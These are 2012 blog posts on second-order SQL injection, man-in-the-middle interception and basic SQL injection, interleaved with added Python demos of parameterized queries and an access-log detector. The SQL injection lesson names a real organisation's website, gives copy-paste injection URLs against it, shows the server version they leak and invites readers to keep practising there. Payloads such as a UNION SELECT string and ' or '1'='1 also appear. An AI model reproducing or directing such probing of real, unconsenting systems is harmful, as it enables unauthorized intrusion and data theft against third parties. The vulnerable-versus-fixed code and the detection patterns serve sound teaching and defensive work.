
October 17, 2012

Second Order SQL Injection


Taken From: http://www.esecforte.com/our-blog/

I always thought that escaping single quotes in string-based user input used for database transactions would prevent SQL injection, but this is not always the case when single quotes are escaped inconsistently (as we will see in this blog).
Say hello to SQL injection of the second order!
Basically, a second order SQL injection takes place when one functionality of a web application takes input from a user, escapes (rather than strips) all SQL metacharacters and inserts that input into the database. Later, another functionality of the same application reads that stored data back and uses it to build a second SQL query without escaping it first (bad idea!). The query built by the second functionality introduces the SQL injection bug known as second order SQL injection.
I haven't heard of any second order SQL injection attacks on real world targets, so I decided to make up an example attack myself. Following are the two functionalities with their respective code (select.php and insert2.php).
The first functionality inserts data into the database. The second uses the data stored in the fname column to craft a SQL query, fetches data from the database and shows it on the frontend. To make it easy to follow, all the SQL queries run by the web application are also shown on the frontend.
Let's do a basic walk through of the applications. First, using insert2.php, our details are inserted as shown:-
As we can see from the second pair of examples, this application escapes any single quotes while inserting data into the database. Now, let's use select.php to get the inserted data.

This application also escapes the user input, as shown, and queries the database using that value. The fname value returned by the first query is then used to run a second query that gets all the data about the user. We can see from the select.php code that the second query does not escape the fname value returned from the database and uses it directly to get all the data. This is the point of our second order SQL injection.
So, to manipulate the second query of this application in a meaningful way, we have to inject a SQL fragment into the first name field of insert2.php, make sure the resulting query is correctly formed, and then use select.php to trigger the vulnerable query. We open insert2.php and inject the value "aaaa' union select version(),2,3,'a" in the first name field as shown:-
Now we open select.php, enter the name "attack" and hit enter to get the following:-
Alright!! We were able to exploit the vulnerability to run an arbitrary query on the database. Similarly, advanced SQLi techniques could be used to gain unauthorized access to the database.
The way this application was vulnerable to second order SQLi is very unlikely in the real world; it was only used to demonstrate exploitation of this class of vulnerability. Hope the explanation was clear and everyone liked it :)
Cheers!!
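As an added illustration (not from the esecforte post or its PHP code), the same inconsistency is reproduced here in Python against an in-memory SQLite table, next to the parameterized version that removes it. The schema, the username/fname/email columns and the three-column payload (sqlite_version() standing in for MySQL's version()) are constructed for this demo.

```python
import sqlite3

def make_db():
    """Constructed demo schema: a username to look a user up by, plus the fname column the blog abuses."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, fname TEXT, email TEXT)")
    return conn

def escape_quotes(value):
    """Escaping as the first functionality does it: double every single quote, strip nothing."""
    return value.replace("'", "''")

def register_user(conn, username, fname, email):
    """First functionality: every field is escaped, so this INSERT itself is not injectable."""
    sql = "INSERT INTO users (username, fname, email) VALUES ('%s', '%s', '%s')" % (
        escape_quotes(username), escape_quotes(fname), escape_quotes(email))
    conn.execute(sql)
    conn.commit()

def show_user_vulnerable(conn, username):
    """Second functionality as the post describes it: the user-supplied value is escaped,
    but the fname read back from the database is trusted and concatenated unescaped."""
    first = "SELECT fname FROM users WHERE username = '%s'" % escape_quotes(username)
    row = conn.execute(first).fetchone()
    if row is None:
        return []
    second = "SELECT id, fname, email FROM users WHERE fname = '%s'" % row[0]  # stored data, not escaped
    return conn.execute(second).fetchall()

def show_user_fixed(conn, username):
    """Hardened version: both queries bind their values, so where a value came from no longer matters."""
    row = conn.execute("SELECT fname FROM users WHERE username = ?", (username,)).fetchone()
    if row is None:
        return []
    return conn.execute("SELECT id, fname, email FROM users WHERE fname = ?", (row[0],)).fetchall()

# Constructed payload in the style of the blog's; three columns to match this demo's second query.
PAYLOAD = "aaaa' UNION SELECT sqlite_version(),2,'a"

def demo():
    """Register one user whose first name carries the payload, then read it back both ways."""
    conn = make_db()
    register_user(conn, "attack", PAYLOAD, "a@example.invalid")
    return show_user_vulnerable(conn, "attack"), show_user_fixed(conn, "attack")

if __name__ == "__main__":
    vulnerable, fixed = demo()
    print("vulnerable second query returned:", vulnerable)  # the UNION row: (version string, 2, 'a')
    print("parameterized second query returned:", fixed)    # the literal stored row for user 'attack'
```

The escaping in register_user is not wrong in itself; the defect is that show_user_vulnerable treats a value as safe because it came from the database. Binding parameters in every query, as show_user_fixed does, makes the origin of a value irrelevant.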


March 6, 2012

Man In The Middle Attack

The man-in-the-middle attack intercepts a communication between two systems. For example, in an HTTP transaction the target is the TCP connection between client and server. Using different techniques, the attacker splits the original TCP connection into two new connections, one between the client and the attacker and the other between the attacker and the server, as shown in figure 1. Once the TCP connection is intercepted, the attacker acts as a proxy, able to read, insert and modify the data in the intercepted communication.
** Proxy: see my session about the Burp proxy.

Figure 1: MITM (image Main_the_middle.JPG)

The MITM attack is very effective because of the nature of the HTTP protocol and its data transfer, which are all ASCII based. This makes it possible to view and intervene both within the HTTP protocol and in the data transferred. So, for example, it is possible to capture a session cookie by reading the HTTP header, but it is also possible to change the amount of a money transaction inside the application context, as shown in figure 2.

Figure 2: Request (image Request.JPG)

The MITM attack can also be carried out over an HTTPS connection using the same technique; the only difference is the establishment of two independent SSL sessions, one over each TCP connection. The browser sets up an SSL connection with the attacker, and the attacker establishes another SSL connection with the web server. In general the browser warns the user that the digital certificate is not valid, but the user may ignore the warning because they don't understand the threat.

Figure 3: Firefox certificate warning example (image ff_mitm.png)

In some specific contexts the warning does not appear, for example when the server certificate has been compromised by the attacker, or when the attacker's certificate is signed by a trusted CA and its CN is the same as that of the original web site.

MITM is not only an attack technique; the same setup is routinely used during the development of a web application and for web vulnerability assessments.

January 5, 2012

SQL injection - Part 1

Last time we finished talking about the Web Proxy and its features.

We learned how to use some of its main functions, such as intercepting packets, targeting them, repeating requests and even using them for brute force attacks.

Lesson #5 : SQL injection : Session No.1

Today we're gonna discuss the famous attack called SQL injection.

Well, first let's step into the language itself and learn some basic phrases.

SQL (or Structured Query Language) is a programming language designed for managing data in relational database management systems (RDBMS).
Its scope includes data insert, query, update and delete, schema creation and modification, and data access control.

The SQL language is subdivided into several language elements, including:

Clauses, which are constituent components of statements and queries.
Expressions, which can produce either scalar values or tables consisting of columns and rows of data.
Predicates, which specify conditions that can be evaluated to SQL three-valued logic (3VL) or Boolean (true/false/unknown) truth values and which are used to limit the effects of statements and queries, or to change program flow.
Queries, which retrieve the data based on specific criteria. This is the most important element of SQL.
Statements, which may have a persistent effect on schemata and data, or which may control transactions, program flow, connections, sessions, or diagnostics.

O.k., after the boring part... let's jump into the queries:

The most common operation in SQL is the query, which is performed with the declarative SELECT statement. SELECT retrieves data from one or more tables, or expressions. Standard SELECT statements have no persistent effects on the database.

Queries allow the user to describe desired data, leaving the database management system (DBMS) responsible for planning, optimizing, and performing the physical operations necessary to produce that result as it chooses.

+ The FROM clause indicates the table(s) from which data is to be retrieved.
+ The WHERE clause includes a comparison predicate, which restricts the rows returned by the query. The WHERE clause eliminates from the result set all rows for which the comparison predicate does not evaluate to True.

And now... The example: :mrgreen: :mrgreen: 

This query returns a list of expensive books. * means "return all the table's columns",
FROM [tableName] (in our case Book), WHERE the column named "price" holds a value larger than 100.00 in that row, and finally order the rows by the "title" column.
------------------------------------------
SELECT *
FROM Book
WHERE price > 100.00
ORDER BY title;
------------------------------------------
So the answer can look like this:

Title                        | Price  | Author
-----------------------------|--------|---------------
How to become a Hacker       | 405.7  | Ido.N
The Joy of Pink              | 132.99 | Pink Panther
An Introduction to nonsense  | 221.50 | Garfield
Pitfalls of Beer             | 102.00 | Homer Simpson

** If you want to see only the "Price" and "Title", all you need to do is SELECT the
right columns.
------------------------------------------
SELECT title, price
FROM Book
...
------------------------------------------

That was hardly even the basics, but you can continue reading here:
http://en.wikipedia.org/wiki/SQL

:ugeek: :ugeek: So now let's talk a little about what exactly is an SQL injection:ugeek: :ugeek: 

SQL injection is often used to attack the security of a website by inputting SQL statements in a web form to get a badly designed website to perform operations on the database (often to dump the database content to the attacker) other than the usual operations as intended by the designer. 

SQL injection is a code injection technique that exploits a security vulnerability in a website's software. 
The vulnerability occurs when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements, or when user input is not strongly typed and is unexpectedly executed.

SQL commands are thus injected from the web form into the database of an application (like queries) to change the database content or dump the database information like credit card or passwords to the attacker. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

This form of SQL injection occurs when user input is not filtered for escape characters and is then passed into an SQL statement. This results in the potential manipulation of the statements performed on the database by the end user of the application.

So now that we understand what the attack is, we can dive into the injection itself.
Let's look at a simple injection.

This is the developer side, or, more commonly, the server side:

statement = "SELECT * FROM users WHERE name = '" + userName + "';"


Here we can see a variable which holds the SQL statement; it takes a value from an end user in a parameter called "userName" and retrieves the matching row from the table "users".
After retrieving the user's name from the database, the web form opens a block with this name (if it exists, else it drops an error).

If the "userName" variable is crafted in a specific way by a malicious user, the SQL statement may do more than the code author intended. For example, setting the "userName" variable to:


' or '1'='1


renders the following SQL statement in the parent language:


SELECT * FROM users WHERE name = '' OR '1'='1';


This example could be used to force the selection of a valid username because the evaluation of '1'='1' is always true.
Beyond that simple query, there is a way to "break" the query like this:


' OR '1'='1' UNION SELECT @@version';


This kind of injection will retrieve two result sets, one with the valid user and the second with the database's version.
But they will be displayed together.
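As an added example (not code from this lesson), the statement above is reproduced in Python against an in-memory SQLite table so the two outcomes can be compared side by side: the concatenated statement answers the "' or '1'='1" input with every row, while the bound-parameter version treats the same input as a literal name. It goes one step beyond the text and also covers a numeric parameter, where the cheapest defence is to reject anything that is not an integer before it gets near SQL. The users table and its three rows are constructed for the demo.

```python
import sqlite3

def make_users_db():
    """Constructed in-memory stand-in for the lesson's 'users' table (assumption: an id and a name column)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users (name) VALUES (?)", [("alice",), ("bob",), ("carol",)])
    conn.commit()
    return conn

def find_user_vulnerable(conn, user_name):
    """The lesson's server-side statement: the input is spliced into the SQL text itself."""
    statement = "SELECT * FROM users WHERE name = '" + user_name + "';"
    return conn.execute(statement).fetchall()

def find_user_safe(conn, user_name):
    """Same lookup with a bound parameter: the value travels separately from the SQL and is never parsed as SQL."""
    return conn.execute("SELECT * FROM users WHERE name = ?", (user_name,)).fetchall()

def parse_id(raw):
    """For numeric parameters, accept only decimal digits; anything else is rejected, not repaired."""
    return int(raw) if raw.isdecimal() else None

def find_by_id_safe(conn, raw_id):
    """Typed lookup: an input such as "1 or 1=1" never reaches the database at all."""
    user_id = parse_id(raw_id)
    if user_id is None:
        return []
    return conn.execute("SELECT * FROM users WHERE id = ?", (user_id,)).fetchall()

if __name__ == "__main__":
    conn = make_users_db()
    payload = "' or '1'='1"
    print("vulnerable:", find_user_vulnerable(conn, payload))  # every row comes back
    print("safe:      ", find_user_safe(conn, payload))        # no user has that literal name
    print("typed id:  ", find_by_id_safe(conn, "1 or 1=1"))   # rejected before any query runs
```

Note that the fix is not a better escaping routine: find_user_safe never builds SQL text from the input at all, which is why the same payload that unlocks the whole table in find_user_vulnerable simply matches nothing.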

Here is a live example, please use it to view only!

http://www.istanbuleczaciodasi.org.tr/nobetler.php?t=b&bolgeID=1

This is a trashed Turkish website I encountered a few months ago.
Let's try and inject something... shall we :)

http://www.istanbuleczaciodasi.org.tr/nobetler.php?t=b&bolgeID=1'

What happened?!? :?: :?: :shock: :shock: 

O.k. stay calm.. this is exactly what we wanted to accomplish.

Look at the error on the first row:


Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near '\'. (severity 15) in /usr/local/www/ieowwwroot/nobetler.php on line 82


It says:
Warning: means the code will still run (errors can crash the site, but warnings don't).
mssql_query() message: the warning's details.
** Those warnings are the hacker's best friend, because when I can tell you what you did wrong, you will know exactly what to change in order to make it work.

For example:
----------------------------------------------------------------------------------------------------
your query:

http://www.someDomain.com/BFid=1' make breakfast;

breakfast_query_message: 'there is no egg in the pan'

your next query:

http://www.someDomain.com/BFid=1' take out an egg from the fridge;....make breakfast;

breakfast_query_message: 'omelet is ready'
----------------------------------------------------------------------------------------------------
Where the warning occurred:
in /usr/local/www/ieowwwroot/nobetler.php on line 82

You can see the path disclosure, which counts as a vulnerability in itself.
/usr/local/www/ means the server is Linux based.

/ieowwwroot/ is the directory the web service is in, and the page that
emitted the warning is "nobetler.php".

Now that we understand what went on, we can try to inject ourselves.

Copy and paste the next Url:

http://www.istanbuleczaciodasi.org.tr/nobetler.php?t=b&bolgeID=1 or 1=1

Now investigate the differences between bolgeID=1 and bolgeID=1 or 1=1

You'll see that the first displays only one option, and the other displays all the options...
this is exactly what we did earlier in the example above (remember? 8-) ).

This means there is an SQL injection at hand, and the database will answer the queries we inject into the parameter.
It seems the query is:


statement = "SELECT * FROM [sometable] WHERE ID = " + bolgeID + ";"


So as I told you before... let's try and "break" this query into retrieving data it shouldn't retrieve... :twisted: :twisted: 

Copy and paste the next Url:

http://www.istanbuleczaciodasi.org.tr/nobetler.php?t=b&bolgeID=@@version

Now you will see that the warning changed, and the injection succeeded.

Let's look at the warning.

Warning: mssql_query() [function.mssql-query]: message: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86) Jul 9 2008 14:43:34 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2, v.2825) to data type int. (severity 16) in /usr/local/www/ieowwwroot/nobetler.php on line 82

You can see that I put "@@version" into the parameter "bolgeID".
The following error was returned:

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86) Jul 9 2008 14:43:34 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2, v.2825) ' to data type int

This means there was a problem converting my input to the type this parameter is supposed to receive --> "to data type int" (int means integer - natural numbers).

Also, the query succeeded in retrieving the version of the database:

'Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86) Jul 9 2008 14:43:34 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2, v.2825) '

There are a lot of injections that can be committed through this parameter.
I'll let you practice a little :D :D :)
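Seen from the other side of the wire, the steps in this walkthrough leave a trail. The indicators it relies on (a stray quote, an "or 1=1" tautology, an @@ server variable, UNION SELECT) are exactly what a defender looks for in the web server's access log. The following is an added example, not part of the lesson: the log lines are constructed, using a generic /items.php?id= path, and the parsing and matching logic is mine. The point it adds is that matching must be done on the percent-decoded parameter values, because that is the form in which the database receives them.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (Common Log Format); they are not taken from any real server.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jan/2012:10:01:02 +0000] "GET /items.php?t=b&id=1 HTTP/1.1" 200 5120
10.0.0.5 - - [05/Jan/2012:10:01:09 +0000] "GET /items.php?t=b&id=1%27 HTTP/1.1" 200 812
10.0.0.5 - - [05/Jan/2012:10:01:15 +0000] "GET /items.php?t=b&id=1%20or%201%3D1 HTTP/1.1" 200 9800
10.0.0.5 - - [05/Jan/2012:10:01:21 +0000] "GET /items.php?t=b&id=%40%40version HTTP/1.1" 200 790
10.0.0.9 - - [05/Jan/2012:10:02:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 3000
"""

# Pulls the method and request target out of the quoted request field of a log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Indicators mirroring the lesson's walkthrough, matched against each decoded parameter value.
INDICATORS = [
    ("quote", re.compile(r"'")),
    ("tautology", re.compile(r"\bor\b\s+\d+\s*=\s*\d+", re.IGNORECASE)),
    ("server_variable", re.compile(r"@@\w+")),
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE)),
]

def scan_line(line):
    """Return (parameter name, indicator label) pairs found in one log line's query string."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    query = urlsplit(match.group("target")).query
    hits = []
    # parse_qsl percent-decodes values, so %27 is examined as the quote it becomes server-side.
    for name, value in parse_qsl(query, keep_blank_values=True):
        for label, pattern in INDICATORS:
            if pattern.search(value):
                hits.append((name, label))
    return hits

def scan_log(text):
    """Map 1-based line number -> hits, for every line that triggered at least one indicator."""
    findings = {}
    for number, line in enumerate(text.splitlines(), start=1):
        hits = scan_line(line)
        if hits:
            findings[number] = hits
    return findings

if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG).items():
        print(f"line {number}: {hits}")
```

Run on the sample, lines 2, 3 and 4 are flagged on the id parameter and the two ordinary requests are not. In practice these patterns are a starting point for alerting, not a filter to put in front of the application; the query-building code still has to bind its parameters.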

See ya next session, where we discuss the differences between certain databases and dive even deeper into the queries.
Please download SQL express for next Session. :geek: 

Thank you for reading.
You're welcome to promote me with inboxing the uTest team.

Cheers,